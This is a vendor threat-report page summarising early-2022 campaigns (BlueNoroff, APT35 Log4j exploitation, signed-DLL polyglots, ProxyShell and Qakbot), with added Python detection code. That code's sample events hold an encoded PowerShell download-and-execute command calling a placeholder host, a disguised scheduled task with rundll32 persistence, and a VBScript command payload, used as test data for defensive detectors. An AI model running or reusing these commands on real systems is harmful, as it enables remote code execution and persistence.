The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks: each report points your team at malicious exploit strings to search for and at exposure checks to run on endpoint devices and servers, which can help identify successful payload delivery and compromise through the vulnerability in question.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

We curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The products of our craft are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports Hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us; we're happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

BlueNoroff Cryptocurrency Focused APT Group

January 18, 2022

Industry: Finance & Technology | Level: Operational | Source: Securelist

Kaspersky shared research on BlueNoroff, an APT group it tracks that appears to be associated with Lazarus. Kaspersky began tracking the group after its 2016 attack on Bangladesh's central bank. The group's particular proficiency is "the abuse of trust. Be it an internal bank server communicating with SWIFT infrastructure to issue fraudulent transactions, cryptocurrency exchange software installing an update with a backdoor to compromise its own user, or other means." Its activity over the past year has focused on cryptocurrency startups. The group makes initial contact through services such as Google Drive or LinkedIn messages as a lure, delivering malicious documents either directly or inside a compressed archive that also contains an LNK file. Opening the document launches PowerShell and/or a VBScript that performs basic fingerprinting of the system before the actor moves on to further objectives such as collecting credentials or stealing cryptocurrency. The group operates patiently, studying the environment so that its activity blends in.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Rundll32 Command Line
    • Suspicious File written to Disk
    • Windows Copy Files

APT35 CharmPower & Log4j

January 18, 2022

Industry: N/A | Level: Tactical | Source: CheckPoint

Intelligence from Check Point details the Iranian nation-state group APT35 (aka Charming Kitten, TA453, or Phosphorus) exploiting the Log4j vulnerability (CVE-2021-44228) to distribute its PowerShell toolkit, CharmPower. As the tool's name suggests, the chain that follows a successful Log4j exploit is heavily PowerShell based: the malicious Java class triggers an encoded PowerShell command that downloads a module from an Amazon S3 bucket and executes a loader. CharmPower contains modules for downloading additional payloads, system enumeration, data collection, and exfiltration.

  • Anvilogic Use Cases:
    • Suspicious process Spawned by Java
    • Encoded Powershell Command
    • Suspicious Executable by Powershell
    • Executable Process from Suspicious Folder

Web Page Archive Files

January 18, 2022

Industry: N/A | Level: Operational | Source: NetSkope

Netskope Threat Labs has observed malicious Microsoft Office documents distributed as Web Page Archive files (".mht" or ".mhtml") in recent campaigns that also use the collaborative programming environment Glitch for C2. Based on past campaigns that used .mht and .mhtml files, there is a potential link to APT32/OceanLotus. The malicious document contains VBS code, with the payload carried in the web archive, and drops a DLL onto disk. A scheduled task is then created, masquerading as "Winrar Update" and executing every 10 minutes. The DLL injects itself into another process and spawns rundll32 to run indefinitely. Finally, data collected from network reconnaissance is sent to a C2 server hosted on Glitch.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Rundll32 Command Line
    • Create/Modify Schtasks
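The two chains above (the Log4j exploit handing off to an encoded PowerShell command in the APT35 CharmPower entry, and the "Winrar Update" scheduled task plus rundll32 in the web-archive entry) both surface in process-creation telemetry. The block below is an added example written for this page, not Anvilogic's detection content: it runs four small rules over constructed sample events (the field names, paths, command lines and the download URL are all assumptions, not real logs) and decodes the -EncodedCommand payload so an analyst sees what the PowerShell actually does.

```python
"""Toy process-creation detections for the Log4j -> encoded PowerShell chain
and the scheduled-task / rundll32 chain described above. Added example, not
Anvilogic content. Event keys and sample events are constructed; real telemetry
(Sysmon Event ID 1, EDR process events) would be mapped into the same fields."""
import base64
import re

# Interpreters and LOLBins a Java process should rarely launch (assumption).
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe", "regsvr32.exe",
}
# Path fragments an unprivileged user can write to.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")


def _encode_ps(text):
    """Base64(UTF-16LE), the form PowerShell expects; used only to build samples."""
    return base64.b64encode(text.encode("utf-16le")).decode()


# Constructed sample events (not real logs): 0 mimics the CharmPower first stage,
# 1 and 2 mimic the .mht chain, 3 and 4 are benign administrative activity.
EVENTS = [
    {"parent": r"C:\Program Files\Java\jre\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('https://bucket.example.net/stage.ps1')")},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 10 /tn "Winrar Update" '
                r'/tr "rundll32.exe C:\Users\Public\Libraries\update.dll,Start"'},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\Libraries\update.dll,Start"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc daily /st 03:00 /tn "Nightly Backup" '
                r'/tr "C:\Program Files\Backup\run.exe"'},
]


def image_name(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    for m in ENC_FLAG.finditer(cmdline):
        flag, b64 = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy, -ep
        try:
            return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-16le")
        except ValueError:  # bad Base64 or odd-length UTF-16
            return None
    return None


def detect(event):
    """Return the names of the rules that fire on one process-creation event."""
    parent, image = image_name(event["parent"]), image_name(event["image"])
    cmd = event["cmdline"]
    low = cmd.lower()
    alerts = []
    # Log4Shell post-exploitation: the vulnerable JVM launching an interpreter.
    if parent in ("java.exe", "javaw.exe") and image in SUSPICIOUS_CHILDREN:
        alerts.append("suspicious_process_spawned_by_java")
    # Encoded PowerShell; the decoded text is what the analyst wants to see.
    if image in ("powershell.exe", "pwsh.exe") and decode_encoded_command(cmd) is not None:
        alerts.append("encoded_powershell_command")
    # schtasks /create with a minute schedule (schtasks defaults /mo to 1 minute).
    if image == "schtasks.exe" and "/create" in low:
        sc = re.search(r"/sc\s+(\w+)", low)
        mo = re.search(r"/mo\s+(\d+)", low)
        if sc and sc.group(1) == "minute" and (mo is None or int(mo.group(1)) <= 15):
            alerts.append("schtasks_create_short_interval")
    # rundll32 loading a DLL from a user-writable directory.
    if image == "rundll32.exe" and any(p in low for p in USER_WRITABLE):
        alerts.append("rundll32_from_user_writable_path")
    return alerts


def scan(events):
    """Map event index -> fired rules, for the events that fired at least one."""
    hits = {}
    for i, event in enumerate(events):
        rules = detect(event)
        if rules:
            hits[i] = rules
    return hits


if __name__ == "__main__":
    for i, rules in scan(EVENTS).items():
        print(i, rules, decode_encoded_command(EVENTS[i]["cmdline"]))
```

The schtasks rule deliberately alerts when /mo is absent, because a minute schedule without a modifier repeats every minute; the benign daily task and the unencoded -File invocation produce no alert, which is the false-positive check worth keeping when porting these rules to a real query language.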

Signed DLL Campaigns / Polyglot

January 18, 2022

Industry: N/A | Level: Operational | Source: Medium

Security researchers Jason Reaves and Joshua Platt shared details of campaigns that use "polyglotting" to bypass security checks. As the researchers found, "Recently an actor has begun using a technique of embedding VBScript data at the end of Microsoft signed DLLs in order to GPG decrypt and then detonate payloads." Recent campaigns have distributed the malicious files through illegitimate software installers; the malware delivered includes AteraAgent RAT, Zloader, Gozi, and Cobalt Strike. The activity varies: most of the VBScript alters Windows Defender settings, invokes a PowerShell download, and modifies the registry, and some variants issue shutdown commands.

  • Anvilogic Scenario: Polyglot – Signed DLLs
  • Anvilogic Use Cases:
    • Cscript or Wscript execution
    • Invoke-WebRequest Command
    • Modify Windows Defender
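A practical check for the technique above is to look past the end of the last PE section, since that overlay is where both the Authenticode certificate table and any appended data live. The block below is an added example written for this page, not the researchers' tooling: it parses the section table, carves the overlay, reports how many bytes trail the certificate table, and searches the whole overlay for VBScript markers (the marker list is an assumption and would be tuned to the campaign). The sample DLL is constructed inside the block with a placeholder certificate blob, not a real Microsoft-signed binary, and nothing here validates the signature itself.

```python
"""Overlay check for the signed-DLL polyglot technique described above.
Added example, not the researchers' tooling. The sample is a constructed
minimal PE32 DLL with a placeholder certificate blob; the signature is
never validated, only the bytes around it are inspected."""
import struct

# VBScript fragments worth flagging in an overlay (assumption, tune per campaign).
SCRIPT_MARKERS = (b"CreateObject(", b"WScript.", b"Shell.Application", b"Execute(")


def _pe_headers(data):
    """Return (optional_header_offset, num_sections, opt_size) or raise ValueError."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    return coff + 20, num_sections, opt_size


def pe_overlay(data):
    """Bytes past the end of the last section's raw data."""
    opt, num_sections, opt_size = _pe_headers(data)
    section_table = opt + opt_size
    end = 0
    for i in range(num_sections):  # SizeOfRawData, PointerToRawData at +16/+20
        raw_size, raw_ptr = struct.unpack_from("<II", data, section_table + i * 40 + 16)
        end = max(end, raw_ptr + raw_size)
    return data[end:]


def security_directory(data):
    """(file offset, size) of the certificate table; (0, 0) when unsigned."""
    opt, _, opt_size = _pe_headers(data)
    magic = struct.unpack_from("<H", data, opt)[0]
    directories = 96 if magic == 0x10B else 112  # PE32 vs PE32+
    if opt_size < directories + 5 * 8:
        return (0, 0)
    return struct.unpack_from("<II", data, opt + directories + 4 * 8)  # entry 4


def scan(data):
    """Summarise what sits in the overlay and whether it looks like script."""
    overlay = pe_overlay(data)
    sec_off, sec_size = security_directory(data)
    # Appended data may trail the certificate table or be padded inside it,
    # so the marker search covers the whole overlay, not only the tail.
    past_cert = len(data) - (sec_off + sec_size) if sec_size else len(overlay)
    return {"overlay_bytes": len(overlay),
            "bytes_past_cert_table": past_cert,
            "script_markers": [m.decode() for m in SCRIPT_MARKERS if m in overlay]}


def build_sample_dll(appended=b"", inside_cert=False):
    """Constructed minimal PE32 DLL: one .text section and a fake cert blob."""
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<I", opt, 92, 16)    # NumberOfRvaAndSizes
    cert_body = b"\x30\x00" + b"\0" * 54 + (appended if inside_cert else b"")
    cert = struct.pack("<IHH", 8 + len(cert_body), 0x200, 2) + cert_body
    struct.pack_into("<II", opt, 128, 0x400, len(cert))  # Security directory
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x2102)
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200,
                          0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + bytes(opt) + section).ljust(0x200, b"\0")
    text = b"\xC3".ljust(0x200, b"\0")
    return headers + text + cert + (b"" if inside_cert else appended)


if __name__ == "__main__":
    payload = b'Set sh = CreateObject("WScript.Shell")\r\nsh.Run "cmd /c whoami", 0'
    print(scan(build_sample_dll()))
    print(scan(build_sample_dll(appended=payload)))
    print(scan(build_sample_dll(appended=payload, inside_cert=True)))
```

The inside_cert variant is the case to remember: bytes padded into the certificate table show zero bytes past the signature and may still verify, so a check that only looks at trailing data misses it, which is why the marker search runs over the entire overlay.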

ProxyShell Exploited with DatopLoader Leading to Qakbot

January 18, 2022

Industry: N/A | Level: Operational | Source: Cybereason

A threat report from Cybereason, drawing on the ProxyShell research of security researcher Orange Tsai, investigates a new malware loader, DatopLoader, which emerged in September 2021. The loader was observed being dropped following the attacker's successful exploitation of the ProxyShell Exchange vulnerabilities. Once the loader executes, Qakbot/Qbot lands on the victim's workstation to establish persistence and conduct reconnaissance, largely with native tools, AdFind being the exception. Cobalt Strike is also launched and uses PsExec to move laterally through the environment. Credential access was also observed, through dumping of registry hives.

  • Anvilogic Scenario: DatopLoader & Qakbot
  • Anvilogic Use Cases:
    • Potential ProxyShell
    • Common Exchange Recon cmdlets
    • Exchange Remove Export Request
    • regsvr32 Execution
    • Credentials in Registry

SysJoker

January 18, 2022

A report from Intezer shares research on a new backdoor, SysJoker, that was discovered in December

AvosLocker Targets VMware ESXi

January 05, 2022

Industry: N/A | Level: Strategic | Source: BleepingComputer

AvosLocker has added Linux support to its ransomware arsenal, with researchers identifying the latest variant targeting VMware ESXi virtual machines. One victim, an unnamed entity, was identified by threat researcher Christiaan Beek (@ChristiaanBeek) and was hit with a $1 million ransom demand. Limited technical details have been released, but the ransomware is known to terminate VMs prior to encryption, append the extension ".avoslinux" to encrypted files, and drop a ransom note for victims. The note stipulates that machines must not be shut down, to "avoid file corruption."

FinalSite Ransomware

January 05, 2022

Industry: Education & Technology | Level: Strategic | Source: FinalSite

FinalSite, a school website design SaaS provider, suffered a ransomware attack on January 4, 2022. The attack impacted many school districts, as FinalSite states its solution is used by over 8,000 schools and universities in 115 countries. With their websites inaccessible, affected districts have had trouble sending emergency email notifications, which is especially pertinent as schools announce closures and COVID-related news. The company is working with the cyber forensic investigation firm Charles River Associates on a more comprehensive investigation and has provided limited details on the impact of the attack. From the company statement: "After six days of investigation, we know when the threat actor entered, how they entered, and what they looked at. We are confident in saying that no client data has been viewed, compromised, or extracted". Although the ransomware strain has been identified, the SaaS provider did not disclose the variant.

Video Player Spreads Skimmers

January 05, 2022

Industry: Real Estate | Level: Strategic | Source: PaloAltoUnit42 & TheRecord

Research from Palo Alto Unit 42 identified over 100 real estate sites compromised to distribute skimmers that collect user information. The affected sites all belonged to one parent company, Sotheby's, whose Brightcove account had been compromised. The compromised sites all imported the same malicious video from the cloud video platform, which in essence made this a supply chain attack. The issue affecting Sotheby's and Brightcove had been resolved before Unit 42 shared its analysis and findings.